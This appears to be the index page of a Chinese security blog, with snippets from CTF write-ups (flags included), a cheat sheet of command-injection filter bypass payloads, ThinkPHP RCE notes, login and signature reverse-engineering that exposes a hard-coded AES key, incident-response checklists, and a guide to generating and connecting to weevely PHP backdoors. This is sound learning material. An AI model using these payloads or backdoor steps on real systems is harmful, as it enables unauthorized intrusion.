我再没见过 像你一般的星空~
年
新
乐
快
...
某云签署签名算法逆向分析
这里有签名验证,开始逆向
这里看到signInfo是f
往上看f是由p的sha256得来
再往上看,p由h的base64得来
h为appid和bussNo和timestamp和random生成
appid是固定的,每个账号一个,我这里为R45W5Gj7PzPdp7Di
现在找bussno
bussno是x
而x为上面的那个return x得来
点进去这个函数查看
将这个js写成python
import random#bussNodef random_word(use_range, min_len, max_len=None): chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" length = min_len if not use_range else random.randint(min_len, max_len) return ''.join(random.choice(chars) for _ in range( ...
HGAME-WEEK1
WEB2048*16这题应该是过关了就能拿到flag,一开始尝试修改增加的分数,发现一下子分数飚的太高了,然后达不到32768,于是想着,直接把游戏的状态,从一开始的!1改成1,就实现了,游戏还没开始就结束了。
Select Courses
有一个获取课程的api这里能修改是否已经满了,还有现在的状态(是否已选)一开始尝试修改这个的返回包,将满的true改成false,然后去选课,发现依然不行,后面尝试并发,条件竞争。这两个包同时并发,然后一定概率就会让课程成功选择(有点玄学)最后还是把全部课程选完了hgame{w0W_!_1E4Rn_To_u5e_5cripT_^_^}
Bypass it这个直接点注册点不了题目提示说所以我把js禁用,他就无法把我拉回登录页面了随便注册一个账号然后回去登录
ezHTTP根据提示使用burp修改然后拿到一个jwt的token去解密{ “F14g”: “hgame{HTTP_!s_1mP0rT4nt}”}
JhatJhat是用来解析java堆转储文件的这里使用OQL可以执行对象查询,有点像SQL这里根据hint知道需要rce可以想到a=ja ...
命令执行绕过姿势(持续更新)
绕过空格过滤的方法\${IFS}\$9{IFS}\$IFS\${IFS}\$IFS\$1//\$1改成\$加其他数字貌似都行IFS\<\<\>{cat,flag.php}//用逗号实现了空格功能,需要用{}括起来%20(space)%09(tab)X=\$'cat\\x09./flag.php';\$X(\\x09表示tab,也可以用\\x20)
禁用cat的方法ps:有时会禁用cat:解决方法是使用tac反向输出命令:linux命令中可以加\\,所以甚至可以ca\\t/fl\\ag
内联执行绕过?ip=127.0.0.1;cat\$IFS\$9\`ls\`\$IFS在Linux下表示为空格\$9是当前系统shell进程第九个参数持有者,始终为空字符串,\$后可以接任意数字这里\$IFS\$9或\$IFS垂直,后面加个\$与{}类似,起截断作用
变量拼接?ip=127.0.0.1;a=g;cat\$IFS\$1fla\$a.php ...
Vulhub笔记
ThinkphpThinkphp2.x,3.0http://47.115.215.87:8080/index.php
漏洞原因$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));这是一个路由匹配规则$var[\'\\1\']="\\2"这里\是转义转义后$var['\1']="\2"$var['\1']="\2" 这里双引号引发函数执行,在php中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,如果{}写的是一个已知函数,那么这个函数就会被执行。thinkphp路由的 ...
2023信息安全管理与评估样题笔记
任务1:网络平台搭建只有网络平台搭建与网络安全配置阶段,CTF阶段样题没有具体环境。
根据网络拓扑图所示,按照IP地址参数表,对DCFW的名称、各接口IP地址进行配置。(8分)进防火墙web需要console上去然后man http,否则进不去
改名
创建聚合接口
根据网络拓扑图所示,按照IP地址参数表,对DCRS的名称进行配置,创建VLAN并将相应接口划入VLAN。(10分)改名
配置Vlan
根据网络拓扑图所示,按照IP地址参数表,对DCRS各接口IP地址进行配置。(10分)
根据网络拓扑图所示,按照IP地址参数表,对DCWS的各接口IP地址进行配置。(8分)
根据网络拓扑图所示,按照IP地址参数表,对DCBC的名称、各接口IP地址进行配置。(8分)
根据网络拓扑图所示,按照IP地址参数表,对WAF的名称、各接口IP地址进行配置。(8分)
配置通过配置路由协议ospf实现全网网络连通,到因特网流量采用默认路由。(8分)DCRS:具体ospf配置:DCRS(config)#router ospf 1DCRS(config-router)#network 192.16. ...
HCIP-Datacom-Core Technology H12-821 笔记(持续更新、目前70题)
以下关于OSPF协议说法错误的是?A OSPF协议支持区域划分B OSPF支持对等价路由进行负载分担C OSPF报文封装在IP报文内,可以采用单播或组播的形式发送D OSPF是一个基于链路状态的外部网关协议笔记:D是错误的说法,应该是OSPF是一个基于链路状态的内部网关协议。
下面关于AS_PATH的描述,错误的是?A 当路由器中存在两条或者两条以上的到同一目的地的路由时,这些路由可以通过此属性比较相互之间的优劣,AS_PATH越长的路径越优先B AS_PATH是指BGP路由在传的路径中所经历的AS的列表C BGP不会接受AS PATH性中包含本AS Number的路由D AS_PATH是BGP中一个公认必遵属性笔记:选项 A 是错误的,因为在 BGP 中,AS_PATH 越短的路径越优先,而不是越长的路径越优先。因此,选项 A 是错误的描述。其他选项都是正确的描述:B. AS_PATH 属性是 BGP 路由在传递过程中所经历的 AS 序列的列表。这个列表包含了路由传递过程中经过的 AS 序列编号,可以用来检测环路,并帮助路由器做出最佳路由选择。C. BGP 不会接受包含本 AS 号 ...
应急响应之系统排查
Windows系统查看本地用户和组普通用户:win+r 输入lusrmgr.msc隐藏用户:win+r 输入regedit查看注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
系统日志分析win+r 输入eventvwr.msc 查看windows日志
网络与端口分析win+r 输入netstat -ano 查看活动连接
恶意进程分析win+r 输入tasklist 查看进程列表
自启动分析win+r 输入msconfig 查看自启动服务
检查计划任务win+r 输入schtasks
分析最近打开的文件win+r 输入%UserProfile%\Recent
Linux系统历史执行命令记录history
检查定时任务ls /etc/cron*
查看用户cat /etc/passwd # 查看用户信息文件cat /etc/shadow # 查看影子文件awk -F: '$3==0{print $1}' /etc/passwdcat /etc/passwd | grep x:0# 查看系统是否还 ...
记一次学习通登录逆向
打开浏览器,进入学习通登录页面。F12——随便输入账号密码点击登录——网络——fanyalogin–负载,这里发现uname和password使用了加密手段进行加密。
尝试搜索password了解使用什么加密手段。
这里找到了一个encryptByAES()函数,看起来像是加密方式,第一个参数为密码,第二个参数为密钥。
点击进去,跳转到源代码界面。看到了像是密钥的字符串transferKey = "u2oh6Vu^HWe4_AES"
为了验证密钥是否真实,再次搜索encryptByAES,找到它加密的方法。
同样点进去,在加密方法的返回值return处下个断点。
点击登录,发现已经断下来了,F9,单步走。
到这已经证实了猜想。下面复现一下它的加密过程,将encryptByAES的方法复制到在线js运行工具里调试。在原来的基础上加上一句代码调用它的方法,console.log(encryptByAES('123','u2oh6Vu^HWe4_AES'));
function encryptByAES(message, key){ let CBCOpti ...
weevely工具的使用
生成shellweevely generate 密码 路径 文件名
weevely generate cmd ./backdoor.php(weevely --man中有命令)weevely generate -obfuscator cleartext1_php cmd ./backdoor.php (用模板生成混淆的shell,weevely -generate --help中有命令)
连接shellweevely url 密码
weevely http://127.0.0.1/backdoor.php cmd
各项模块键入:help查看更多帮助信息
weevely>:help
信息搜集: :shell_su 通过更变使用者来执行shell命令,可以获得root权限来执行命令. :shell_sh 执行 shell 命令,例如:shell_php system('dir'); ...